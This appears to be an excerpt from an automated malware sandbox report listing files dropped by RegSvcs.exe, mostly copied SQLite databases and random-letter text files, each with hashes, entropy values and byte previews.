                                                SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                                                Malicious:false
                                                Preview:SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                Category:dropped
                                                Size (bytes):131072
                                                Entropy (8bit):0.07093764277882578
                                                Encrypted:false
                                                SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                                                MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                                                SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                                                SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
                                                SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                                                Malicious:false
                                                Preview:SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.702896917219035
                                                Encrypted:false
                                                SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                Malicious:false
                                                Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.688505748329201
                                                Encrypted:false
                                                SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                Malicious:false
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.695860210921229
                                                Encrypted:false
                                                SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                Malicious:false
                                                Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.69782189124949
                                                Encrypted:false
                                                SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                Malicious:false
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.702896917219035
                                                Encrypted:false
                                                SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                Malicious:false
                                                Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.688505748329201
                                                Encrypted:false
                                                SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                Malicious:false
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.695860210921229
                                                Encrypted:false
                                                SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                Malicious:false
                                                Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.69782189124949
                                                Encrypted:false
                                                SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                Malicious:false
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.3870145383915669
                                                Encrypted:false
                                                SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                MD5:1623709C6B2FB813984B1265C26A85F1
                                                SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                Malicious:false
                                                Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.3870145383915669
                                                Encrypted:false
                                                SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                MD5:1623709C6B2FB813984B1265C26A85F1
                                                SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                Malicious:false
                                                Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
